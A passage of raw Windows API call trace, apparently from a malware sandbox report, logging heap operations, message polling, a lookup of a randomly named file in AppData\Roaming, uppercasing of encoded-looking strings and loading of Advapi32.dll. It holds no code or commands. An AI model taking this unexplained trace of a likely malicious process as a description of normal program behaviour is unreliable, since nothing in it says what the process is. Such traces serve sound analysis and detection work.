Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0149.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0149.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.396] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0149.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0149.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0149.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0149.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0149.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0149.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0149.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0149.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0149.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0149.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0149.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0149.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0149.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0149.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0149.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.399] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/NWn0_eXN3pgA63Ym.mkv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2f9bdd0, ftCreationTime.dwHighDateTime=0x1d5d54e, ftLastAccessTime.dwLowDateTime=0x84f14450, ftLastAccessTime.dwHighDateTime=0x1d5cf5d, ftLastWriteTime.dwLowDateTime=0x84f14450, ftLastWriteTime.dwHighDateTime=0x1d5cf5d, nFileSizeHigh=0x0, nFileSizeLow=0x62c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NWn0_eXN3pgA63Ym.mkv", cAlternateFileName="NWN0_E~1.MKV")) returned 0x9e1cf8 [0149.399] FindClose (in: hFindFile=0x9e1cf8 | out: hFindFile=0x9e1cf8) returned 1 [0149.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.400] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0149.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0149.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0149.401] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0149.401] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.401] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.401] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0149.401] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.401] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.402] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.402] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.402] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0149.402] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.402] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.403] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.403] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.403] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.403] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.403] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.404] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 